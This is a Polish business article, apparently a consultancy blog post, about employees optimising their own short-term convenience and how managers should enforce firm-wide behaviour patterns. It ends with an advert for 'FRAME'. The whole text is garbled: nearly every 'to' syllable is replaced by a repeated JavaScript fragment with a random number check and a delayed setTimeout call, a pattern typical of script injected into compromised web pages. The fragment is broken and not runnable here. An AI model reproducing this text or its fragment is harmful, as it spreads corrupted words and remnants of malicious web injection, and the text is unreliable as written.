In Uniwersalne

Ale menedżerowie już powinni. Pracownicy częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zostawiają swoją pracę w momencie, jaki jest im wygodny i w takim stanie, w jakim jest, a nie w takim, żeby kiedyś komuś (częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to przecież im) było łatwiej i szybciej. Nie zastanawiają się np. nad tym, że kiedyś k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś będzie musiał dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to posprzątać, dokończyć czy znaleźć. Ma być wygodnie, im oraz tu i teraz. Najczęściej robią w dobrej wierze, przecież obecne zadanie chcą zrobić szybciej i sprawniej.

Z punktu widzenia całej firmy optymalizacja pracy wygląda dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to inaczej. Jeśli kierowca wózka widłowego zostawi go na środku rampy, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wszyscy będą go musieli omijać, choć on sam dotrze do wybranego miejsca szybciej, niż gdyby odstawił wózek w rogu, gdzie jego miejsce. Jeśli k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś zostawi papiery w miejscu do tego nieprzeznaczonym, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wykona swoją pracę szybciej, ale później wszyscy będą ich szukali kilka godzin. Jeśli informatyk nie opisze, w jakim stanie zostawił pracę czy co tak dokładnie wykonał, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to drugi straci więcej czasu, żeby dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sprawdzić, niż gdyby wykonał tę robotę sam. To jednak optymalizacja na poziomie pracownika. Na poziomie firmy wygląda dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zupełnie inaczej. I sprawić, żeby było inaczej, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zadanie menedżerów.

Zadaniem menedżerów optymalizacja całe firmy, a nie jest optymalizacja wygody i efektywności pojedynczego pracownika, w dodatku nie tylko tu i teraz, tylko wszystkich i przez cały czas. Dlatego muszą przewidywać skutki krótkookresowej optymalizacji zachowania pojedynczego pracownika, muszą także dostrzec jakie negatywne skutki dla funkcjonowania Modelu firmy ma takie zachowanie i je odpowiednio zmodyfikować.

Uwaga. „miliony składają się z centów”. Pojedyncze zachowanie pojedynczego szeregowego pracownika ma zwykle minimalne znaczenie dla Modelu i wydaje się, że spokojnie można je pominąć. Jednak działanie całego Modelu zależy właśnie od takich pojedynczych zachowań i dlatego nie można ich zignorować. Trzeba zauważać i reagować zawsze, inaczej suma drobnych działań wypaczy zasady całego Modelu.

Pracy nie ubędzie

Od optymalizacji „tu i teraz” pracy nie ubędzie, a raczej przybędzie. Od tego, że k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś, by było szybciej, zostawił papiery gdzie bądź. Teraz będzie szybciej, ale później będzie trudniej, dłużej i drożej. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to oznacza, że pracy nawet jej przybędzie.

Uwaga. „nie mam teraz czasu posprzątać”. Tak myślą nawet menedżerowie i właściciele. Wydaje się, że nawał pracy uniemożliwia sprzątanie, przecież nie zdążymy. Jednak w bałaganie pracuje się wolniej, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to spowolnienie rozkłada się jednak na wiele drobnych zdarzeń, więc umknie przy jednym, widocznym opóźnieniu.

Jeśli pliki zostaną opisane byle jak i zapisane byle bądź, byle szybciej, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to potem trudno będzie zlokalizować i ten czas zostanie później stracony.

Perspektywa pracownika zależy od jego pozycji w organizacji

To wynika z pozycji w strukturze firmy i funkcji w Modelu Biznesowym, ale też z horyzontu własnego rozliczania. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to rozliczanie może zmodyfikować perspektywę patrzenia.

Perspektywa patrzenia modyfikuje zachowania. W zależności od perspektywy patrzenia zmieniają się cele. I nagle wzmożony wysiłek tu i teraz, a nawet wolniejsze tempo stają się pożądane w średniej perspektywie.

Uwaga. „perspektywa żaby i pustułki”. Żaba widzi bardzo wyraźnie, widzi też bardzo szeroko, prawie dookoła głowy. Jednak ceną, jaką za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to płaci jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że widzi tylko na krótki dystans. Radzi sobie z tym tak, że dostrzega tylko elementy, które się poruszają, co pozwala jej mózgowi „obrobić” obraz. Jej przeciwieństwem jest pustułka, ptak drapieżny, który poluje na owady. Ten widzi z daleka, np. widzi z wysokości 100 m zielonego pasikonika w zielonej trawie, jednak jego kąt widzenia jest bardzo wąski. Podobnie pracownicy, będąc blisko zdarzeń, produktów i klientów widzą wszystko i dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to bardzo wyraźnie, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak bez dalszej perspektywy. Za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ich kierownicy widzą wprawdzie dalej, ale już nie tak wyraźnie. Do tego widzenia dopasowane jest zachowanie – ten k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to widzi wyraźnie, ale bez dalszej perspektywy optymalizuje „tu i teraz”, a o tym, co dalej będzie myślał, gdy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dalej stanie się „teraz”.

Jak zmodyfikować horyzont rozliczania? Tylko zmieniając pozycję w organizacji. Dlatego na poziomie wykonawczym trzeba sięgnąć nie do horyzontu, tylko do wzorca zachowań. Tu do gry wkracza zarządzanie, w skrócie skłonienie pracowników, aby zachowywali się zgodnie z interesem firmy lub zatwierdzonym przez nią wzorem zachowań.

W przypadku horyzontu rozliczania wyzwania jakie s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toją przed menedżerem są identyczne, jak w każdym innym przypadku zarządzenie pracownikiem. Można sobie poradzić „po prośbie”, „przekupstwem” oraz „po groźbie” i ścisłą kontrolą. Me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda „po prośbie” czyli tłumaczenie, motywowanie czy indoktrynowanie prędzej czy później stanie przed wyzwaniem że interes pracownika nie pokrywa się z interesem firmy. Me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda przekupstwa, czyli modyfikowania interesu pracownika wynagrodzeniem (przecież jego otrzymanie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to część jego interesu osobistego) też działa tylko tak długo, aż pracownik się nie przyzwyczai. Długookresowo najczęściej pozostaje stworzenie wzorca zachowań i ścisła kontrola jego wykonywania.

Co ma zrobić menadżer?

Oczywiście na początku zawsze powinien pracownikom tłumaczyć i wyjaśniać, dlaczego wszystko war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to odkładać na miejsce, choć z ich krótkookresowego punktu widzenia będzie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trwało nieco dłużej, niż gdyby pozostawili bałagan. Trzeba wyjaśniać, dlaczego war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to porządkować swoją pracę, a szczególnie jej wyniki, aby innym było łatwo i wygodnie je odnaleźć, a także od razu się zorien dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, co zawierają, choć teraz wymaga dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to więcej wysiłku i pozornej straty czasu.

Jednak tu trudno liczyć na zrozumienie w dłuższym okresie i za każdym razem. Raczej menedżer powinien pilnować wzorca zachowań i wymagać, a potem jeszcze kontrolować. Jeśli wyjaśni dlaczego war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robić, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tylko lepiej, ale samo wyjaśnienie nie wystarczy. Tego trzeba wymagać, a także dopilnować.

Trzeba zacząć od systemu (zwanego Modelem Biznesowym firmy), w tym jednak przypadku przełożonego na konkretne działania konkretnego pracownika, na konkretnym stanowisku i w konkretnej sytuacji. Każdy pracownik powinien wiedzieć, czego firma od niego oczekuje, gdzie ma zostawiać wózek, papiery, nożyczki, jak i gdzie zapisywać pliki. Ustalając taki system, trzeba oczywiście wysłuchać opinii pracowników, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trafnie wykazują, czego nie war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robić.

Uwaga. „od czego są menedżerowie średniego szczebla?” Są od wypełniania luk we wzorcach działania. Nigdy nie jest tak, że wzorzec przewidzi wszystko i zawsze, wtedy mają wkroczyć oni. Korzystając z tego, że mają szerszą perspektywę, dostrzegą te luki i wypełnią je poleceniami. Bez tego wystarczyłoby, że każdy by dostał wzorzec działania i go wykonał. Tak jednak nie jest i nigdy nie będzie, każdy Model (już choćby tylko dlatego, że dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Model, czyli uproszczenie rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości) ma luki i te luki mają wypełnić menedżerowie.

Drugim krokiem jest dopilnowanie. System, którego się nie przestrzega, a raczej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toleruje nieprzestrzeganie, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie system, tylko bałagan. To już lepiej niczego nie wprowadzać.

Uwaga. „kontrola kosztuje”. Trzeba pamiętać, że kontrola kosztuje, nie tylko w kosztach operacyjnych, ale też w tym, że kontrolowani pracownicy nie wykazują inicjatywy, nie podejmują wyzwań ani tym bardziej odpowiedzialności. Firma zostanie ze swoim Modelem sama i tylko na nim będzie musiała polegać.

Trzecim krokiem jest wyciąganie konsekwencji. To trudne, przecież pracownicy łamią system w przeświadczeniu, że robią dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dla dobra firmy, dla sprawności i szybkości własnego działania. Rzadko przyznają się, nawet przed sobą, że robią dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z lenistwa i dla wygody.

Uwaga. „wzorzec musi być zgodny z Modelem”. Przecież pracownik nie jest rozliczany z wykonania Modelu, tylko wzorca zachowań. I jeśli firma nie zadba, aby ten wzorzec służył Modelowi (czy w międzyczasie się zdezaktualizował), dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pracownicy pracują dobrze, a Model działa źle.

Podsumowanie

Pracownicy częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wykonują zadania byle jak, a raczej tak, aby było im szybciej i wygodniej. Czasem dla wygody, a czasem dlatego, że naprawdę wierzą, że tak będzie szybciej. I będzie, ale tylko im, i tylko teraz. To efekt braku planowania i przewidywania, że k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś kiedyś będzie musiał zapłacić za ich obecną wygodę własnym dodatkowym wysiłkiem i czasem. A jeśli nawet się o tym pomyśli, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to mniejszy własny wysiłek dziś jest bardziej atrakcyjny, niż czyjś inny, w dodatku kiedyś w przyszłości.

Menedżerowie są jednak odpowiedzialni nie za efektywność tego konkretnego pracownika i tylko teraz, ale za wszystkich i cały czas. Dlatego oni muszą już dostrzegać takie sytuacje, przewidywać, co będzie w przyszłości i planować. A pracownikom nie wadzi wytłumaczyć, jednak najlepiej ich zobowiązać do pożądanego zachowania, najlepiej procedurą.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.